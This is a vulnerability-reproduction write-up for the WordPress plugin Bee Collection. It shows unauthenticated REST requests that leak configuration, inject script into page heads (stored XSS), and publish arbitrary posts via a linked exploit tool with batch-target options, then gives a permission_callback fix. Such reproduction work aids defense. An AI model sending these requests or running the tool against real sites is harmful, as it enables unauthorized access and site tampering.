Reproducing the latest (2022-2-16) vulnerabilities in the WordPress plugin Bee Collection (XSS, WordPress username exposure, arbitrary article publishing)
2022-06-25 21:25:00 【Deng_ Xian_ Sheng】
The affected software is a WordPress article collection (scraper) plugin, Bee Collection. The API endpoints that implement the plugin's functions perform no authentication, so a request sent by anyone is executed.
Download the vulnerability reproduction environment: https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA (extraction code: wwi7)
Partial POC and EXP: https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP
Download the environment and unzip "WordPress plugin Bee Collection reproduction environment.zip".
Set up the environment according to its README.md; I won't repeat that here.
Vulnerability 1
WordPress username exposure
The plugin's collection page is shown in the figure below:
The API that fetches page information is not restricted in any way, so an attacker can obtain the WordPress username and other information.

Open the browser's inspect-element panel, refresh the page and look at the POST request.
Then copy the request URL and the request body into a testing tool.

URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}
As you can see, the information is returned without any authentication.
Vulnerability 2
XSS attack
The plugin's "Custom code" page is also unauthenticated: custom code can be viewed and added freely.

Send a request with the testing tool and look at the result:
# View custom code
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}
This returns the content of the custom code (empty here, because none has been added yet).
# Add custom code
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{
    "action": "save",
    "data": [
        {
            "title": "testCode",
            "content": "<script>alert(\" I'm dengwenyi , I am in Shenzhen, Guangdong !\")</script>\n<h1> I'm dengwenyi , I am in Shenzhen, Guangdong !</h1>",
            "status": "on",
            "position": "head"
        }
    ]
}
As you can see, the custom code was added successfully, and the page reflects it.

Note: I just like that sentence and wanted to put it in the text; don't be surprised, it is harmless.
Vulnerability 3
Arbitrary article publishing
This reproduction relies on the "Partial POC and EXP" download link above.
For the specific implementation, see the Golang code and the README.md in the GitHub repository.
We simply download the executable compiled by the author and use it.
Download the executable:
Create a folder and put the executable in it, because it writes logs to the directory it runs in.
Run it with -h to see the usage.
A brief explanation:
--IP the IP of your Kali machine
--Port the port on your Kali machine; any unused port will do
--Type either 'POC' or 'EXP'; defaults to POC
--PayloadForTitle and --PayloadForMain
Fill in either one of the two, or both. These are the payloads used when --Type is EXP: PayloadForTitle is the title of the published post and PayloadForMain is its body. When --Type is POC they may be left empty. Payload values may also be given as a file path.
--PageType the publishing type, i.e. whether the WordPress item is a post or a page; defaults to 'Article' (post); 'Page' is also accepted.
--ET the penetration target. If omitted, the tool runs in interactive mode; if given, it runs in automatic mode and only accepts a file path. Targets in the file are separated by ',', for example:
192.168.0.1,192.168.0.2,192.168.0.3
Let's use interactive mode to test whether the vulnerability exists:
./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080

This enters interactive mode; type -h at the prompt for help.
A brief explanation:
--ET the penetration targets, separated by ','; for example:
192.168.0.1,192.168.0.2,192.168.0.3
Close exits interactive mode
The vulnerability is found, as shown in the picture:
-ET 192.168.8.6:8080

Let's finish the POC run and add the EXP parameters to test EXP:
./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle I'm dengwenyi , I am in Shenzhen, Guangdong --PayloadForMain I'm dengwenyi , I am in Shenzhen, Guangdong

The penetration succeeded:
Checking WordPress confirms that an article was indeed added:

After exiting EXP, we see many log files generated in the current directory; they record the penetration:
Suggestions for fixing
Temporarily disabling the plugin avoids being affected by this vulnerability.
Caution: this test was carried out in a safe environment. All code is limited to running in the reproduction environment; do not maliciously tamper with the code or run it outside the test environment, otherwise the consequences are your own responsibility!
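Beyond disabling the plugin, the root cause of all three issues is that the plugin's REST routes are registered without any permission check. As an added illustration (not the plugin's own code), the following shows how a WordPress plugin would register the crawler route from the page with a permission_callback so that anonymous requests are rejected; the route path follows the page, while the function names and the handler body are assumptions.

```php
<?php
// Added illustration of a properly authorized WordPress REST route.
// Not the Bee Collection plugin's code; function names are assumptions.

add_action( 'rest_api_init', function () {
    register_rest_route( 'wp-beebox/v1', '/crawler', array(
        'methods'             => 'POST',
        'callback'            => 'beebox_demo_crawler_handler',
        // Without a permission_callback, WordPress treats the route as
        // public (and since 5.5 emits a _doing_it_wrong notice).
        'permission_callback' => 'beebox_demo_require_admin',
    ) );
} );

// Authorization check run by WordPress before the handler.
// Cookie-authenticated callers must also send a valid X-WP-Nonce header,
// which WordPress verifies first; an anonymous request therefore has no
// current user and fails the capability check below.
function beebox_demo_require_admin( WP_REST_Request $request ) {
    // Assumption: only administrators may read plugin configuration.
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            __( 'You are not allowed to access this endpoint.', 'beebox-demo' ),
            // 401 for anonymous callers, 403 for logged-in users without the capability.
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

// Handler only runs once the permission callback has returned true.
function beebox_demo_crawler_handler( WP_REST_Request $request ) {
    $action = $request->get_param( 'action' );
    if ( 'get_config' !== $action ) {
        return new WP_Error( 'rest_invalid_param', 'Unknown action', array( 'status' => 400 ) );
    }
    // Placeholder response; a real plugin would return its stored configuration here.
    return rest_ensure_response( array( 'configured' => true ) );
}
```

The same permission_callback belongs on the /code route, whose "save" action injects HTML into every page head, and on whatever route the publishing tool abuses; restricting all of them to manage_options is what makes the unauthenticated requests shown above fail.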